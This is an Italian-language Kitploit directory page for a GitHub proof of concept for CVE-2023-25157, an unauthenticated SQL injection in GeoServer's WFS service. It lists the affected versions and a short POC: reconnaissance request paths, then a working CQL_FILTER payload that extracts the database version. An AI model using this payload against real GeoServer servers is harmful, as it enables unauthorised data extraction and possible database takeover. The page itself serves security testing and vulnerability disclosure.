Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/charis3306/cve-2023-25157
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

Exploit per CVE-2023-25157: iniezione SQL nel servizio WFS di GeoServer tramite sintassi di filtro CQL appositamente predisposta, che consente l'estrazione remota di dati non autenticata e il potenziale compromissione del server di database.

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione della vulnerabilità

A causa della mancata sanitizzazione dell'input utente, un attaccante remoto non autenticato può costruire una sintassi di filtro malformata, bypassare l'analisi lessicale di GeoServer e provocare un'iniezione SQL, ottenendo informazioni sensibili dal server e potenzialmente anche i permessi del server di database.

Versioni interessate

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

POC

Ottenere i nomi delle feature disponibili

Ricerca

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Ottenere gli attributi disponibili delle feature correlate

nome della feature per ottenere gli attributi correlati

vulhub:example
root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

Scarica lo strumento